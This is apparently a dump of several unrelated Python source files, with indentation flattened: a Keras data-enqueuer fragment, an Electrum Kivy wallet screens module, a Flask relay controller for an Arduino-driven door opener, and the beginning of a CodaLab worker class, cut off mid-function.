with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
try:
inputs = self.queue.get(block=True, timeout=5).get()
if self.is_running():
self.queue.task_done()
if inputs is not None:
yield inputs
except queue.Empty:
pass
except Exception: # pylint: disable=broad-except
self.stop()
six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None, id_queue=None):
"""Initializer function for pool workers.
Args:
gens: State which should be made available to worker processes.
random_seed: An optional value with which to seed child processes.
id_queue: A multiprocessing Queue of worker ids. This is used to indicate
that a worker process was created by Keras and can be terminated using
the cleanup_all_keras_forkpools utility.
"""
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
worker_proc = multiprocessing.current_process()
# name isn't used for anything, but setting a more descriptive name is helpful
# when diagnosing orphaned processes.
worker_proc.name = 'Keras_worker_{}'.format(worker_proc.name)
if random_seed is not None:
np.random.seed(random_seed + worker_proc.ident)
if id_queue is not None:
# If a worker dies during init, the pool will just create a replacement.
id_queue.put(worker_proc.ident, block=True, timeout=0.1)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Args:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
@keras_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Args:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(generator, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of works.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, self.random_seed, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
six.reraise(*sys.exc_info())
|
screens.py
|
import asyncio
from decimal import Decimal
import threading
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.recycleview import RecycleView
from electrum.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum import bitcoin, constants
from electrum.transaction import tx_from_any, PartialTxOutput
from electrum.util import (parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice,
InvoiceError, format_time)
from electrum.lnaddr import lndecode
from electrum.logging import Logger
from .dialogs.confirm_tx_dialog import ConfirmTxDialog
from electrum.gui.kivy import KIVY_GUI_PATH
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
from electrum.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/lightning'
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/' + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
if not self.app.wallet:
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(invoice) for invoice in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
item.update(self.get_card(invoice))
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice) -> Dict[str, Any]:
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
key = self.app.wallet.get_key_for_outgoing_invoice(item)
if is_lightning:
assert isinstance(item, LNInvoice)
address = item.rhash
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Navcoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
try:
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
except InvoiceError as e:
self.app.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
def save_invoice(self, invoice):
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice.is_lightning():
if self.app.wallet.lnworker:
self.app.protected(_('Pay lightning invoice?'), self._do_pay_lightning, (invoice,))
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
else:
self._do_pay_onchain(invoice)
def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
def pay_thread():
try:
coro = self.app.wallet.lnworker.pay_invoice(invoice.invoice, attempts=10)
fut = asyncio.run_coroutine_threadsafe(coro, self.app.network.asyncio_loop)
fut.result()
except Exception as e:
self.app.show_error(repr(e))
self.save_invoice(invoice)
threading.Thread(target=pay_thread).start()
def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
outputs = invoice.outputs
amount = sum(map(lambda x: x.value, outputs)) if '!' not in [x.value for x in outputs] else '!'
coins = self.app.wallet.get_spendable_coins(None)
make_tx = lambda rbf: self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, rbf=rbf)
on_pay = lambda tx: self.app.protected(_('Send payment?'), self.send_tx, (tx, invoice))
d = ConfirmTxDialog(self.app, amount=amount, make_tx=make_tx, on_pay=on_pay)
d.open()
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
self.save_invoice(invoice)
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
self.is_max = False # not used for receiving (see app.amount_dialog)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.amount
if amount:
a, u = self.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
lnworker = self.app.wallet.lnworker
try:
if lightning:
if lnworker:
key = lnworker.add_request(amount, message, self.expiry())
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
return
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
if not self.app.wallet.is_deterministic():
addr = self.app.wallet.get_receiving_address()
else:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
except InvoiceError as e:
self.app.show_error(_('Error creating payment request') + ':\n' + str(e))
return
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req: Invoice) -> Dict[str, Any]:
is_lightning = req.is_lightning()
if not is_lightning:
assert isinstance(req, OnchainInvoice)
address = req.get_address()
else:
assert isinstance(req, LNInvoice)
address = req.invoice
key = self.app.wallet.get_key_for_receive_request(req)
amount = req.get_amount_sat()
description = req.message
status = self.app.wallet.get_request_status(key)
status_str = req.get_status_str(status)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description or _('No Description')
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, request):
payments_container = self.ids.requests_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_request_status(key)
status_str = request.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data # needed?
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
irdc_v3.py
|
# import serial
from flask import Flask
from flask import json
from flask import Response
from flask import request
import logging
import os
import threading
import time
import datetime
import signal
from flask_cors import CORS
from pyfirmata import Arduino, util
from time import sleep
up_relay_pin = 2
stop_relay_pin = 3
down_relay_pin = 5
ac_relay_pin = 13
up_led_pin = 10
stop_led_pin = 11
down_led_pin = 12
s = None
app = Flask(__name__)
CORS(app)
magic_sets = []
wifi_sets = [["GGWIFISSID","FF:EE:DD:CC:BB:AA"]]
lastFoundTimeStamp = datetime.datetime.now()
def signal_handler(signal, frame):
global interrupted
interrupted = True
signal.signal(signal.SIGINT, signal_handler)
interrupted = False
def job():
global lastFoundTimeStamp
threadRun = True
while True:
#tmp = os.popen('iwinfo ra0 scan').read()
tmp = os.popen('iwinfo wlan0 scan').read()
#tmp = os.popen('iwlist wlp3s0 scan').readlines()
#print(tmp)
gotSpecificSSID = False
for (ssid,mac) in wifi_sets:
if ssid in tmp and mac in tmp:
gotSpecificSSID = True
break
if gotSpecificSSID:
currentDT = datetime.datetime.now()
#print("FOUND AP at "+ currentDT)
diff = ((currentDT - lastFoundTimeStamp).seconds)
print("diff: "+str(diff))
if diff > 600:
lastFoundTimeStamp = currentDT
# do open
print("FOUND AP at "+ str(currentDT))
relay_action_common(up_relay_pin, up_led_pin)
app.logger.warning("ok, up op by wifi detector")
#time.sleep(8)
nowtime = datetime.datetime.now()
if nowtime.weekday() in range(1,5):
if(nowtime.hour is 2):
app.logger.warning("wifi scan entering weekday night sleep mode")
time.sleep(6 * 60 * 60)
#if(nowtime.hour is 10):
# app.logger.warning("wifi scan entering weekday morning sleep mode")
# time.sleep(7 * 60 * 60)
# if(nowtime.hour in range(18,20) or nowtime.hour in range(8,10)):
# app.logger.warning("wifi scan entering weekday hi-night mode")
# # 7688 scan interval cant less than 5 seconds
# time.sleep(10)
elif nowtime.weekday() in range(6,7):
if(nowtime.hour is 2):
app.logger.warning("wifi scan entering weekend night sleep mode")
time.sleep(5 * 60 * 60)
else:
time.sleep(10)
if interrupted:
print("Gotta go")
threadRun = False
break
# ****************************************************
# open serial COM port to /dev/ttyS0, which maps to UART0(D0/D1)
# the baudrate is set to 57600 and should be the same as the one
# specified in the Arduino sketch uploaded to ATMega32U4.
# ****************************************************
def setup():
# global s
# s = serial.Serial("/dev/ttyS0", 57600)
global board
board = Arduino('/dev/ttyS0')
@app.route("/api/v1.0/turnOnOffLED", methods=['POST'])
def setvideoon():
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
value = request.form['value']
app.logger.warning("run setvideoon value:" + value)
if value == 'on':
board.digital[ac_relay_pin].write(1)
else:
board.digital[ac_relay_pin].write(0)
return json.dumps({"status": 200, "comment": "call turnOnOffLED Finish"})
def relay_action_common(relay_pin, led_pin):
board.digital[relay_pin].write(1)
board.digital[led_pin].write(0)
sleep(1)
board.digital[relay_pin].write(0)
board.digital[led_pin].write(1)
@app.route("/api/v1.0/IRDC/up", methods=['POST'])
def up():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(up_relay_pin, up_led_pin)
# return json.dumps({"status": 200, "comment": "call up Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
@app.route("/api/v1.0/IRDC/stop", methods=['POST'])
def stop():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(stop_relay_pin, stop_led_pin)
#return json.dumps({"status": 200, "comment": "call stop Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
@app.route("/api/v1.0/IRDC/down", methods=['POST'])
def down():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(down_relay_pin, down_led_pin)
#return json.dumps({"status": 200, "comment": "call down Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
@app.route("/api/v1.0/IRDC/package_mode", methods=['POST'])
def packageMode():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(up_relay_pin, up_led_pin)
sleep(2)
relay_action_common(stop_relay_pin, stop_led_pin)
#return json.dumps({"status": 200, "comment": "call down Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
if __name__ == '__main__':
setup()
# t = threading.Thread(target = job)
# t.start()
app.debug = False
handler = logging.FileHandler('flask.log', encoding='UTF-8')
handler.setLevel(logging.DEBUG)
logging_format = logging.Formatter(
'%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')
handler.setFormatter(logging_format)
app.logger.addHandler(handler)
app.run(
host = "0.0.0.0",
port = 54321
)
# t.join()
|
worker.py
|
import logging
import os
import shutil
from subprocess import PIPE, Popen
import threading
import time
import traceback
import socket
import http.client
import sys
from typing import Optional, Set, Dict
import psutil
import docker
from codalab.lib.telemetry_util import capture_exception, using_sentry
import codalab.worker.docker_utils as docker_utils
import requests
from .bundle_service_client import BundleServiceException, BundleServiceClient
from .dependency_manager import DependencyManager
from .docker_utils import DEFAULT_DOCKER_TIMEOUT
from .image_manager import ImageManager
from .download_util import BUNDLE_NO_LONGER_RUNNING_MESSAGE
from .state_committer import JsonStateCommitter
from .bundle_state import BundleInfo, RunResources, BundleCheckinState
from .worker_run_state import RunStateMachine, RunStage, RunState
from .reader import Reader
logger = logging.getLogger(__name__)
"""
Codalab Worker
Workers handle communications with the Codalab server. Their main role in Codalab execution
is syncing the job states with the server and passing on job-related commands from the server
to architecture-specific RunManagers that run the jobs. Workers are execution platform antagonistic
but they expect the platform specific RunManagers they use to implement a common interface
"""
class Worker:
# Number of retries when a bundle service client command failed to execute. Defining a large number here
# would allow offline workers to patiently wait until connection to server is re-established.
COMMAND_RETRY_ATTEMPTS = 720
# Network buffer size to use while proxying with netcat
NETCAT_BUFFER_SIZE = 4096
# Number of seconds to wait for bundle kills to propagate before forcing kill
KILL_TIMEOUT = 100
# Number of loops to check for bundle directory creation by server on shared FS workers
BUNDLE_DIR_WAIT_NUM_TRIES = 120
# Number of seconds to sleep if checking in with server fails two times in a row
CHECKIN_COOLDOWN = 5
def __init__(
self,
image_manager, # type: ImageManager
dependency_manager, # type: Optional[DependencyManager]
commit_file, # type: str
cpuset, # type: Set[str]
gpuset, # type: Set[str]
max_memory, # type: Optional[int]
worker_id, # type: str
tag, # type: str
work_dir, # type: str
local_bundles_dir, # type: Optional[str]
exit_when_idle, # type: str
exit_after_num_runs, # type: int
idle_seconds, # type: int
checkin_frequency_seconds, # type: int
bundle_service, # type: BundleServiceClient
shared_file_system, # type: bool
tag_exclusive, # type: bool
group_name, # type: str
docker_runtime=docker_utils.DEFAULT_RUNTIME, # type: str
docker_network_prefix='codalab_worker_network', # type: str
# A flag indicating if all the existing running bundles will be killed along with the worker.
pass_down_termination=False, # type: bool
# A flag indicating if the work_dir will be deleted when the worker exits.
delete_work_dir_on_exit=False, # type: bool
# A flag indicating if the worker will exit if it encounters an exception
exit_on_exception=False, # type: bool
shared_memory_size_gb=1, # type: int
preemptible=False, # type: bool
):
self.image_manager = image_manager
self.dependency_manager = dependency_manager
self.reader = Reader()
self.state_committer = JsonStateCommitter(commit_file)
self.bundle_service = bundle_service
self.docker = docker.from_env(timeout=DEFAULT_DOCKER_TIMEOUT)
self.cpuset = cpuset
self.gpuset = gpuset
self.max_memory = (
min(max_memory, psutil.virtual_memory().total)
if max_memory is not None
else psutil.virtual_memory().total
)
self.id = worker_id
self.group_name = group_name
self.tag = tag
self.tag_exclusive = tag_exclusive
self.work_dir = work_dir
self.local_bundles_dir = local_bundles_dir
self.shared_file_system = shared_file_system
self.delete_work_dir_on_exit = delete_work_dir_on_exit
self.exit_when_idle = exit_when_idle
self.exit_after_num_runs = exit_after_num_runs
self.num_runs = 0
self.idle_seconds = idle_seconds
self.terminate = False
self.terminate_and_restage = False
self.pass_down_termination = pass_down_termination
self.exit_on_exception = exit_on_exception
self.preemptible = preemptible
self.checkin_frequency_seconds = checkin_frequency_seconds
self.last_checkin_successful = False
self.last_time_ran = None # type: Optional[bool]
self.runs = {} # type: Dict[str, RunState]
self.docker_network_prefix = docker_network_prefix
self.init_docker_networks(docker_network_prefix)
self.run_state_manager = RunStateMachine(
image_manager=self.image_manager,
dependency_manager=self.dependency_manager,
worker_docker_network=self.worker_docker_network,
docker_network_internal=self.docker_network_internal,
docker_network_external=self.docker_network_external,
docker_runtime=docker_runtime,
upload_bundle_callback=self.upload_bundle_contents,
assign_cpu_and_gpu_sets_fn=self.assign_cpu_and_gpu_sets,
shared_file_system=self.shared_file_system,
shared_memory_size_gb=shared_memory_size_gb,
)
def init_docker_networks(self, docker_network_prefix, verbose=True):
"""
Set up docker networks for runs: one with external network access and one without
"""
def create_or_get_network(name, internal, verbose):
try:
if verbose:
logger.debug('Creating docker network %s', name)
network = self.docker.networks.create(name, internal=internal, check_duplicate=True)
# This logging statement is only run if a network is created.
logger.debug('Created docker network %s', name)
return network
except docker.errors.APIError:
if verbose:
logger.debug('Network %s already exists, reusing', name)
return self.docker.networks.list(names=[name])[0]
# Docker's default local bridge network only supports 30 different networks
# (each one of them uniquely identifiable by their name), so we prune old,
# unused docker networks, or network creation might fail. We only prune docker networks
# older than 1h, to avoid interfering with any newly-created (but still unused) networks
# that might have been created by other workers.
try:
self.docker.networks.prune(filters={"until": "1h"})
except (docker.errors.APIError, requests.exceptions.RequestException) as e:
# docker.errors.APIError is raised when a prune is already running:
# https://github.com/codalab/codalab-worksheets/issues/2635
# docker.errors.APIError: 409 Client Error: Conflict ("a prune operation is already running").
# Any number of requests.exceptions.RequestException s are raised when the request to
# the Docker socket times out or otherwise fails.
# For example: https://github.com/docker/docker-py/issues/2266
# Since pruning is a relatively non-essential routine (i.e., it's ok if pruning fails
# on one or two iterations), we just ignore this issue.
logger.warning("Cannot prune docker networks: %s", str(e))
# Right now the suffix to the general worker network is hardcoded to manually match the suffix
# in the docker-compose file, so make sure any changes here are synced to there.
self.worker_docker_network = create_or_get_network(
docker_network_prefix + "_general", internal=True, verbose=verbose
)
self.docker_network_external = create_or_get_network(
docker_network_prefix + "_ext", internal=False, verbose=verbose
)
self.docker_network_internal = create_or_get_network(
docker_network_prefix + "_int", internal=True, verbose=verbose
)
def save_state(self):
# Remove complex container objects from state before serializing, these can be retrieved
runs = {
uuid: state._replace(
container=None, bundle=state.bundle.as_dict, resources=state.resources.as_dict,
)
for uuid, state in self.runs.items()
}
self.state_committer.commit(runs)
def load_state(self):
# If the state file doesn't exist yet, have the state committer return an empty state.
runs = self.state_committer.load(default=dict())
# Retrieve the complex container objects from the Docker API
for uuid, run_state in runs.items():
if run_state.container_id:
try:
run_state = run_state._replace(
container=self.docker.containers.get(run_state.container_id)
)
except docker.errors.NotFound as ex:
logger.debug('Error getting the container for the run: %s', ex)
run_state = run_state._replace(container_id=None)
self.runs[uuid] = run_state._replace(
bundle=BundleInfo.from_dict(run_state.bundle),
resources=RunResources.from_dict(run_state.resources),
)
def sync_state(self):
"""
Sync worker run state by matching the fields that are read from worker-state.json with the RunState object.
"""
for uuid, run_state in self.runs.items():
if run_state._fields == RunState._fields:
continue
values = []
for field in RunState._fields:
# When there are additional new fields or missing fields detected, recreate the run_state
